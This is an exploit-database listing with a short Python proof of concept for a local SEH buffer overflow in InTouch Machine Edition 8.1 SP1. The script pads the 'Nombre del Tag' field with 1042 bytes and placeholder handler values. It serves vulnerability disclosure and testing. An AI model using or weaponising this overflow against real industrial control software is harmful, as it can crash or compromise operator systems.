InTouch Machine Edition 8.1 SP1 - Nombre del Tag Buffer Overflow (SEH) Exploit

2018-09-11T00:00:00
ID 1337DAY-ID-31074
Type zdt
Reporter Luis Martínez
Modified 2018-09-11T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            # Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Vendor Homepage: https://on.wonderware.com/
# Software Link: https://on.wonderware.com/intouch-machine-edition
# Tested Version: 8.1 SP1
# Vulnerability Type: Local Buffer Overflow (SEH Unicode)
# Tested on OS: Windows 10 Pro x64 en
  
# Steps to Produce the Local Buffer Overflow (SEH Unicode): 
# 1.- Run python code: InTouch_Machine_Edition_8.1.py
# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
# 3.- Open ITME v8.1 InTouch Machine Edition
# 4.- Inicio
# 5.- Paste ClipBoard on "Nombre del Tag"
  
#!/usr/bin/env python
 
nSEH = "\x42\x42"
SEH = "\x43\x43"
  
buffer = "\x41" * 1042 + nSEH + SEH
f = open ("InTouch_Machine_Edition_8.1.txt", "w")
f.write(buffer)
f.close()

#  0day.today [2018-09-11]  #